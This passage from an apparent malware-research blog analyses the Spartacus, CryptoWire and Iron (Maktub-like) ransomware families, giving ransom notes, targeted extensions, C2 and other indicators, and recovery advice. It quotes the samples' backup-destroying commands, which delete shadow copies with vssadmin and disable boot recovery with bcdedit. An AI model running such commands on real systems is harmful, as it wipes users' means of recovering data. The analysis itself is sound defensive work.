Prevention

  • Enable UAC
  • Enable Windows Update, and install updates (especially verify if MS17-010 is installed)
  • Install an antivirus, and keep it up-to-date and running
  • Restrict, where possible, access to shares (ACLs)
  • Create backups! (and test them)
More ransomware prevention can be found here.


Conclusion

Satan is not the first ransomware to use EternalBlue (for example, WannaCry), however, it does appear the developers of Satan are continuously improving and adding features to its ransomware.

Prevention is always better than disinfection/decryption.




IOCs

  •  

This is Spartacus: new ransomware on the block


In this blog post, we'll analyse Spartacus, one of many new ransomware families popping up in 2018.


Analysis

This instance of Spartacus ransomware has the following properties:





Figure 1 - Spartacus ransomware message

The message reads:

All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us the e-mail:
MastersRecovery@protonmail.com and send personal ID KEY:
In case of no answer in 24 hours us to theese e-mail: MastersRecovery@cock.li

The user may send up to 5 files for free decryption, as "guarantee". There's also a warning message at the end of the ransomware screen:

Do not rename encrypted files.
Do not try decrypt your data using party software, it may cause permanent data loss.
Decryption of your files with the help of thrid parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Spartacus will encrypt files, regardless of extension, in the following folders:

Figure 2 - Target folders to encrypt

Generating the key:


Figure 3 - KeyGenerator

As far as I'm aware, Spartacus is the first ransomware who explicitly asks you to send the public key (ID KEY), rather than just sending an email, including the Bitcoin address straight away, or sending the key automatically.

Encrypted files will get the extension appended as follows:
.[MastersRecovery@protonmail.com].Spartacus 

For example:
 Penguins.jpg.[MastersRecovery@protonmail.com].Spartacus

It will also drop the ransomware note, "READ ME.txt" in several locations, such as the user's Desktop:

All your data has been locked us. You want to return? Write email MastersRecovery@protonmail.com or MastersRecovery@cock.li Your personal ID KEY: DvQ9/mvfT3I7U847uKcI0QU3QLd+huv5NOYT2YhfiySde0vhmkzyTtRPlcu73BAJILIPdALjAIy5NLxBHckfyV2XS+GXdjlHMx2V/VEfj4BrZkLB3BQtEdAqS1d2yzb/2+AqTNjsRfZ99ZWVxUZO3AeEZk5h0+3hNM5GogUN2oV5zHkbMZuDaXZxQr56r8UKnW7gmSycdcJh2ueZMuEP1tAuuzdZYgmZ05x9ZT8FX9HIo03rwsi6UiJlgUTZCkiilZjxYyG+qVE+Gjk4H7dnXbQP1PC3k2WICA9R4TYb9SCdv8U/e5sxbuKAbJgEZ114liwHLasmLvQfKYSbxMlbEg==

Interestingly enough, Spartacus also embeds what appears to be a hardcoded and private RSA key:

AQABxA4fTMirLDPi4rnQUX1GNvHC41PZUR/fDIbHnNBtpY0w2Qc4H2HPaBsKepU33RPXN5EnwGqQ5lhFaNnLGnwYjo7w6OCkU+q0dRev14ndx44k1QACTEz4JmP9VGSia6SwHPbD2TdGJsqSulPkK7YHPGlvLKk4IYF59fUfhSPiWleURYiD50Ll2YxkGxwqEYVSrkrr7DMnNRId502NbxrLWlAVk/XE2KLvi0g9B1q2Uu/PVrUgcxX+4wu9815Ia8dSgYBmftxky427OUoeCC4jFQWjEJlUNE8rvQZO5kllCvPDREvHd42nXIBlULvZ8aiv4b7NabWH1zcd2buYHHyGLQ==

Spartacus will delete Shadow Volume Copies by issuing the following command:

cmd.exe /c vssadmin.exe delete shadows /all /quiet

A unique mutex of "Test" will be created in order to not run the ransomware twice, and Spartacus will also continuously keep the ransomware screen or message from running in the foreground or on top, using the SetForegroundWindow function:

Figure 4 - Ransom will stay on top and annoy the user



Repeating, email addresses used are:

MastersRecovery@protonmail.com
MastersRecovery@cock.li

Decryption may be possible if the ransomware is left running, by extracting the key from memory.


Conclusion

Spartacus is again another ransomware family or variant popping up.

Figure 5 - Meme

Make sure to read the dedicated page on ransomware prevention to prevent Spartacus or any other  ransomware.



IOCs

  •  

CryptoWire ransomware not dead


CryptoWire is an "open-source" ransomware based on the AutoIT scripting language, and has been around since 2016. For some background, read the following post on Bleeping Computer:
"Proof of Concept" CryptoWire Ransomware Spawns Lomix and UltraLocker Families

I already encountered a CryptoWire variant last year, when it was used to target users in Brazil:
Ransomware, fala sério!

In this blog post, we'll briefly analyse another, recent, CryptoWire sample.

Analysis

This CryptoWire variant has the following properties:


Figure 1 - Typical CryptoWire layout

The message reads:

The only way you can recover your files is to buy a decryption key
The payment method is: Bitcoins. The price is: $1000 = Bitcoins
When you are ready, send a message by email to wlojul@secmail.pro
We will send you our BTC wallet for the transfer
After confirmation we will send you the decryption key
Click on the 'Buy decryption key' button.

CryptoWire will encrypt files with the following extensions (282 total):

3fr, 7z, EPS, M3U, M4A, PEM, PSD, WPS, XLSX, abw, accdb, afsnit, ai, aif, arc, arw, as, asc, asd, asf, ashdisc, asm, asp, aspx, asx, aup, avi, bay, bbb, bdb, bibtex, bkf, bmp, bmp, bpn, btd, bz2, c, cdi, cdr, cer, cert, cfm, cgi, cpio, cpp, cr2, crt, crw, csr, cue, dbf, dcr, dds, dem, der, dmg, dng, doc, docm, docx, dsb, dwg, dxf, dxg, eddx, edoc, eml, emlx, eps, epub, erf, fdf, ffu, flv, gam, gcode, gho, gpx, gz, h, hbk, hdd, hds, himmel, hpp, ics, idml, iff, img, indd, ipd, iso, isz, iwa, j2k, jp2, jpeg, jpf, jpg, jpm, jpx, jsp, jspa, jspx, jst, kdc, key, keynote, kml, kmz, lic, lwp, lzma, m4v, max, mbox, md2, mdb, mdbackup, mddata, mdf, mdinfo, mds, mef, mid, mov, mp3, mp4, mpa, mpb, mpeg, mpg, mpj, mpp, mrw, msg, mso, nba, nbf, nbi, nbu, nbz, nco, nef, nes, note, nrg, nri, nrw, odb, odc, odm, odp, ods, odt, ogg, one, orf, ova, ovf, oxps, p12, p2i, p65, p7, p7b, p7c, pages, pct, pdd, pdf, pef, pem, pfx, php, php3, php4, php5, phps, phpx, phpxx, phtm, phtml, pl, plist, pmd, pmx, png, ppdf, pps, ppsm, ppsx, ppt, pptm, pptx, ps, psd, pspimage, pst, ptx, pub, pvm, qcn, qcow, qcow2, qt, r3d, ra, raf, rar, raw, rm, rtf, rtf, rw2, rwl, s, sbf, set, skb, slf, sme, smm, snp, spb, sql, sr2, srf, srt, srw, ssc, ssi, stg, stl, svg, swf, sxw, syncdb, tager, tc, tex, tga, thm, tif, tiff, til, toast, torrent, txt, vbk, vcard, vcd, vcf, vdi, vfs4, vhd, vhdx, vmdk, vob, vsdx, wav, wb2, wbk, wbverify, webm, wmb, wpb, wpd, wps, x3f, xdw, xlk, xlr, xls, xlsb, xlsm, xlsx, xz, yuv, zip, zipx

It will also encrypt files, regardless of extension, in certain folders such as Desktop.

Files are encrypted with AES, and prepends extension of encrypted files with ".encrypted.". For example: Tulips.encrypted.png.

CryptoWire will delete Shadow Volume Copies and disable BCDEdit by executing these commands:
vssadmin.exe Delete Shadows /All /Quietbcdedit /set {default} recoveryenabled Nobcdedit /set {default} bootstatuspolicy ignoreallfailures

It will additionally create a scheduled task for persistence.

You can decrypt files for this specific variant with the following Decryption Key:
VgjRPoOM0oa92_jId!/wkMeW6,guuSe



Conclusion

Some ransomware variants simply do not die, one example of these appears to be CryptoWire. If you have been hit by this particular strain, use the decryption key as instructed above, and your files will be decrypted.

Make sure to read the dedicated page on ransomware prevention to prevent CryptoWire or any other "open-source" ransomware to infect your machine, and encrypt your files.


IOCs

  •  

Maktub ransomware: possibly rebranded as Iron



In this post, we'll take a quick look at a possible new ransomware variant, which appears to be the latest version of Maktub ransomware, also known as Maktub Locker.

Hasherazade from Malwarebytes has, as per usual, written an excellent blog on Maktub Locker in the past, if you wish to learn more: Maktub Locker – Beautiful And Dangerous

Update - 2018-04-14: Read the conclusion at the end of this post to learn more about how Iron ransomware mimicked at least three different ransomware families.


Analysis

A file was discovered, named ado64 with the following properties:



Maktub typically sports a graphically appealing lock screen, as well as payment portal, and promotes "Maktub Locker" extensively. 


Interestingly enough, this variant has removed all references to Maktub. The figures below represent lock screen and payment portal, when stepping through.


Figure 1 - Lock screen/warning

Email address: recoverfile@mail2tor.com
Bitcoin address: 1cimKyzS64PRNEiG89iFU3qzckVuEQuUj
Ransomware note: !HELP_YOUR_FILES.HTML


Figure 2 - Payment portal

Figure 3 - Hello! (after entering the personal ID)
The text reads:

We’re very sorry that all of your personal files have been encrypted :( But there are good news – they aren’t gone, you still have the opportunity to restore them! Statistically, the lifespan of a hard-drive is anywhere from 3 to 5 years. If you don’t make copies of important information, you could lose everything! Just imagine! In order to receive the program that will decrypt all of your files, you will need to pay a certain amount. But let’s start with something else…


Figure 4 - "We are not lying"


Figure 5 - Ransomware cost


Figure 6 - Where to pay


Figure 7- Last but not least: how to buy Bitcoins


In previous versions of Maktub, you could decrypt 1 file for free, however, with the current rebranding, this option has disappeared. Since the ransomware has rebranded, we'll name it "Iron" or "Iron ransomware", due to the name of the decrypter, IronUnlocker.

 Iron encrypts a whopping total of 374 extensions, these are as follows:

.001, .1cd, .3fr, .8ba, .8bc, .8be, .8bf, .8bi8, .8bl, .8bs, .8bx, .8by, .8li, .DayZProfile, .abk, .ade, .adpb, .adr, .aip, .amxx, .ape, .api, .apk, .arch00, .aro, .arw, .asa, .ascx, .ashx, .asmx, .asp, .asr, .asset, .bar, .bay, .bc6, .bc7, .bi8, .bic, .big, .bin, .bkf, .bkp, .blob, .blp, .bml, .bp2, .bp3, .bpl, .bsa, .bsp, .cab, .cap, .cas, .ccd, .cch, .cer, .cfg, .cfr, .cgf, .chk, .class, .clr, .cms, .cod, .col, .con, .cpp, .cr2, .crt, .crw, .csi, .cso, .css, .csv, .ctt, .cty, .cwf, .d3dbsp, .dal, .dap, .das, .db0, .dbb, .dbf, .dbx, .dcp, .dcr, .dcu, .ddc, .ddcx, .dem, .der, .desc, .dev, .dex, .dic, .dif, .dii, .disk, .dmg, .dmp, .dob, .dox, .dpk, .dpl, .dpr, .dsk, .dsp, .dvd, .dxg, .elf, .epk, .eql, .erf, .esm, .f90, .fcd, .fla, .flp, .for, .forge, .fos, .fpk, .fpp, .fsh, .gam, .gdb, .gho, .grf, .h3m, .h4r, .hkdb, .hkx, .hplg, .htm, .html, .hvpl, .ibank, .icxs, .img, .indd, .ipa, .iso, .isu, .isz, .itdb, .itl, .itm, .iwd, .iwi, .jar, .jav, .java, .jpe, .kdc, .kmz, .layout, .lbf, .lbi, .lcd, .lcf, .ldb, .ldf, .lgp, .litemod, .lng, .lrf, .ltm, .ltx, .lvl, .m3u, .m4a, .map, .mbx, .mcd, .mcgame, .mcmeta, .md0, .md1, .md2, .md3, .mdb, .mdbackup, .mddata, .mdf, .mdl, .mdn, .mds, .mef, .menu, .mm6, .mm7, .mm8, .moz, .mpq, .mpqge, .mrwref, .mxp, .ncf, .nds, .nrg, .nri, .nrw, .ntl, .odb, .odf, .odp, .ods, .odt, .orf, .owl, .oxt, .p12, .p7b, .p7c, .pab, .pbp, .pef, .pem, .pfx, .pkb, .pkh, .pkpass, .plc, .pli, .pot, .potm, .potx, .ppf, .ppsm, .pptm, .prc, .prt, .psa, .pst, .ptx, .pwf, .pxp, .qbb, .qdf, .qel, .qic, .qpx, .qtr, .r3d, .raf, .re4, .res, .rgn, .rgss3a, .rim, .rofl, .rrt, .rsrc, .rsw, .rte, .rw2, .rwl, .sad, .sav, .sc2save, .scm, .scx, .sdb, .sdc, .sds, .sdt, .shw, .sid, .sidd, .sidn, .sie, .sis, .slm, .slt, .snp, .snx, .spr, .sql, .sr2, .srf, .srw, .std, .stt, .sud, .sum, .svg, .svr, .swd, .syncdb, .t01, .t03, .t05, .t12, .t13, .tar.gz, .tax, .tcx, .thmx, .tlz, .tor, .torrent, .tpu, .tpx, .ttarch2, .tur, .txd, .txf, .uax, .udf, .umx, .unity3d, .unr, .uop, .upk, .upoi, .url, .usa, .usx, .ut2, .ut3, .utc, .utx, .uvx, .uxx, .vcd, .vdf, .ver, .vfs0, .vhd, .vmf, .vmt, .vpk, .vpp_pc, .vsi, .vtf, .w3g, .w3x, .wad, .war, .wb2, .wdgt, .wks, .wmdb, .wmo, .wotreplay, .wpd, .wpl, .wps, .wtd, .wtf, .x3f, .xla, .xlam, .xlc, .xlk, .xll, .xlm, .xlr, .xlsb, .xltx, .xlv, .xlwx, .xpi, .xpt, .yab, .yps, .z02, .z04, .zap, .zipx, .zoo, .ztmp

Iron doesn't spare gamers, as it will also encrypt Steam files (.vdf), World of Tanks replays (.wotreplay). DayZ (.DayZProfile), and possibly others.

Folders containing the following words are exempt from encryption:

Windows, windows, Microsoft, Mozilla Firefox, Opera, Internet Explorer, Temp, Local, LocalLow, $Recycle.bin, boot, i386, st_v2, intel, recycle, 360rec, 360sec, 360sand, internet explorer, msbuild

Interestingly enough, 360sec, 360rec, and 360sand is developed by Qihoo 360, an internet security company based in China, and is an antivirus (360 Total Security is one example).  This, as well as the fact that the Iron ransomware also includes resources in Chinese Simplified, alludes this variant may be developed by a Chinese speaker.

The ransomware will additionally delete the original files after encryption, and will also empty the recycle bin. It does not remove Shadow Volume Copies or Restore Points.

Iron embeds a public RSA key as follows:

-----BEGIN RSA PUBLIC KEY-----
MIGJAoGBAIOYf0KqEOGaxdLmMLypMyZ1q/K+r6DuCdYpwZfs0EPug3ye7UjZa0QMOP5/OySr
l/uBJtkmEghEtUEo/zfcBJ7332O1ytJ7/ebIUv+ZcN1Rlswzdv7uZxYRC8u1HvrgBvAz4Atb
zx+FbFVqLB0gGixYTqbjqANq21AR6r91+oJtAgMBAAE=
-----END RSA PUBLIC KEY-----

The Iron ransomware will determine the user's WAN IP and also send a POST request to its C2 server, http://y5mogzal2w25p6bn[.]ml.

Figure 8 - Traffic

It appears Iron will create a new, random GUID, and use it as a mutex, in order to not infect the machine twice. The following values will be sent to the C2:

  • Encryption key;
  • Randk (seed);
  • GUID (mutex);
  • Start (whether ransom successfully started);
  • Market (unknown).
The C2 server will then respond with another set of values, and generate a unique Bitcoin address, which means that victims may pay twice to different addresses. Rule of thumb: do not pay the ransomware.

Of note is an email address in the response: oldblackjack@outlook.com.

Iron will additionally save certain values, such as the GUID, in HKCU\Software\CryptoA:

Figure 9 - Registry values (click to enhance)

Encrypted files will have the .encry extension appended. It is likely not possible to restore data.


Conclusion

It is currently unknown if Iron is indeed a new variant by the same creators of Maktub, or if it was simply inspired by the latter, by copying the design for the payment portal for example.

We know the Iron ransomware has mimicked at least three ransomware families:
  • Maktub (payment portal design)
  • DMA Locker (Iron Unlocker, decryption tool)
  • Satan (exclusion list)
From the screenshots above, it is obvious the portal design has been copy pasted from Maktub.

As for copying from DMA Locker, see this tweet:
and BTW, their unlocker looks like they copied layout from DMA Locker (https://t.co/FFWzMpQ6hu) pic.twitter.com/HWZXGtc2i7
— hasherezade (@hasherezade) April 11, 2018

And, last but not least, it uses the exact same exclusion list (folders and its content that will not be encrypted) from Satan:

Just to clarify, there isn't specific code overlap, as the crypto is quite different to Satan. However, there are similarities in a number of things, such as the exclusion list. https://t.co/OHkFimJ3g7 pic.twitter.com/ub6hOnucgn
— Bart (@bartblaze) April 11, 2018
Code is indeed quite unique, and Iron seems like a totally new ransomware, and may even be a "side project" by the creators of the Satan ransomware. However, at this point, there is no sure way of telling who's behind Iron. Time may be able to tell.

Decryption is impossible without the author's private key, however, it is possible to restore files using Shadow Volume Copies, or alternatively Shadow Explorer. If that doesn't work, you may try using a data recovery program such as PhotoRec or Recuva.

Take note of ID ransomware, if a decryptor should ever become available. Additionally, it may identify other families of ransomware if you are ever affected. Another service to take note of in this regard is NoMoreRansom.

For preventing ransomware, have a look here:

In short: create backups!

Questions, comments, feedback or help: leave a comment below or contact me on Twitter.


Indicators:

Indicator typeIndicator
emailoldblackjack@outlook.com
domainy5mogzal2w25p6bn.ml
FileHash-SHA25619ee6d4a89d7f95145660ca68bd133edf985cc5b5c559e7062be824c0bb9e770
URLhttp://y5mogzal2w25p6bn.ml
URLhttp://y5mogzal2w25p6bn.ml/receive
FileHash-MD51e60050db59e3d977d2a928fff3d34a6
FileHash-SHA1f51bab89b4e4510b973df8affc2d11a4476bd5be
emailrecoverfile@mail2tor.com
On AlienVault:

  •  
❌